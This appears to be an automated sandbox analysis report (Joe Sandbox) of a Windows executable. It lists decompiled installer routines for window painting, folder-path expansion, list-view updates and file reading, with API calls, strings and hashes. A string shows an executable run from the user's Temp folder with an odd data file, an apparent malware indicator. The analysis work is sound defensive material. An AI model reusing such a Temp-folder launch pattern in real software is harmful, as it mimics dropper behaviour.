Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x004066a5
0x004066a5
0x004066a5
0x004066ab
0x004066b0
0x004066c1
0x004066c1
0x004066c9
0x004066ca
0x004066cb
0x004066cc
0x004066cf
0x004066d7
0x004066d9
0x004066ea
0x004066ed
0x004066ed
0x004066f1
0x004066f7
0x004066fa
0x004068d5
0x004068d5
0x004068e0
0x004068ec
0x004068ec
0x00000000
0x00406700
0x00406705
0x0040671a
0x0040671b
0x00406721
0x004068b3
0x004068c1
0x004068c4
0x004068c4
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068bd
0x004068c6
0x004068c6
0x004068cc
0x004068cf
0x00406702
0x00000000
0x00406702
0x00000000
0x004068cf
0x00406727
0x0040672a
0x00406739
0x00406740
0x0040674c
0x0040674f
0x00406752
0x00406753
0x00406758
0x0040675e
0x00406761
0x00406764
0x00406857
0x0040685c
0x0040688f
0x00406894
0x00406899
0x0040689e
0x0040689e
0x004068a3
0x004068a9
0x004068ac
0x00000000
0x004068ac
0x0040685e
0x00406861
0x00406864
0x00406879
0x00406880
0x00406866
0x0040686d
0x0040686d
0x00406888
0x0040688b
0x0040684f
0x00406850
0x00406850
0x00000000
0x0040688b
0x00406771
0x00406775
0x00406775
0x00406776
0x00406778
0x004067b5
0x004067b8
0x004067c8
0x004067cb
0x004067d3
0x004067d9
0x004067d9
0x00406834
0x00406834
0x00406836
0x00000000
0x00000000
0x004067dd
0x004067e2
0x004067e3
0x004067e5
0x004067fc
0x0040680a
0x00406810
0x00406812
0x00406830
0x00406830
0x00406830
0x00000000
0x00406830
0x00406818
0x00406821
0x00406824
0x0040682a
0x0040682e
0x00000000
0x00000000
0x00000000
0x0040682e
0x004067f6
0x004067f8
0x004067fa
0x00000000
0x00000000
0x00000000
0x004067fa
0x00000000
0x00406834
0x004067c0
0x00000000
0x0040677a
0x00406798
0x004067a1
0x0040683e
0x00406842
0x0040684a
0x0040684a
0x00000000
0x00406842
0x004067ab
0x00406838
0x0040683c
0x00000000
0x00000000
0x00000000
0x0040683c
0x00406778
0x00000000
0x00406705

APIs

GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,00000400), ref: 004067C0
GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
lstrcatW.KERNEL32 ref: 0040684A
lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406844
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040678E
"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v, xrefs: 004066CF, 00406782, 00406789, 0040678D, 004067AA, 004067BF, 004067D2, 004067E7, 00406814, 00406849, 0040684F, 0040686C, 0040687F, 0040689D, 004068A3, 004068AC, 004068E2

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-1669150337
Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004056d0
0x004056da
0x004056df
0x004056e5
0x004056f0
0x004056f3
0x004056f6
0x004056fc
0x004056fc
0x00405702
0x0040570a
0x0040570d
0x0040572a
0x0040572e
0x00405737
0x00405737
0x00405741
0x0040574a
0x00405756
0x0040575d
0x00405761
0x00405764
0x00405777
0x00405785
0x00405785
0x00405789
0x0040578b
0x0040578e
0x00000000
0x0040578e
0x0040570f
0x00405717
0x0040571f
0x00405725
0x00000000
0x00405725
0x0040571f
0x0040570d
0x0040579a

APIs

lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
lstrcatW.KERNEL32 ref: 00405725
SetWindowTextW.USER32 ref: 00405737
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 004066A5: lstrcatW.KERNEL32 ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

('B, xrefs: 004056EB

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: ('B
API String ID: 1495540970-2332581011
Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040463d
0x004046f3
0x00000000
0x004046f3
0x0040464e
0x00404652
0x00000000
0x0040466c
0x0040466c
0x00404675
0x00000000
0x00000000
0x00404677
0x00404683
0x00404686
0x00404686
0x0040468c
0x00404692
0x00404692
0x0040469e
0x004046a4
0x004046ab
0x004046ae
0x004046b1
0x004046b3
0x004046b3
0x004046bb
0x004046c1
0x004046c1
0x004046cb
0x004046d0
0x004046d3
0x004046d8
0x004046db
0x004046db
0x004046eb
0x004046eb
0x00000000
0x004046ee

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404648
GetSysColor.USER32 ref: 00404686
SetTextColor.GDI32(?,00000000), ref: 00404692
SetBkMode.GDI32(?,?), ref: 0040469E
GetSysColor.USER32 ref: 004046B1
SetBkColor.GDI32(?,?), ref: 004046C1
DeleteObject.GDI32(?), ref: 004046DB
CreateBrushIndirect.GDI32(?), ref: 004046E5

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
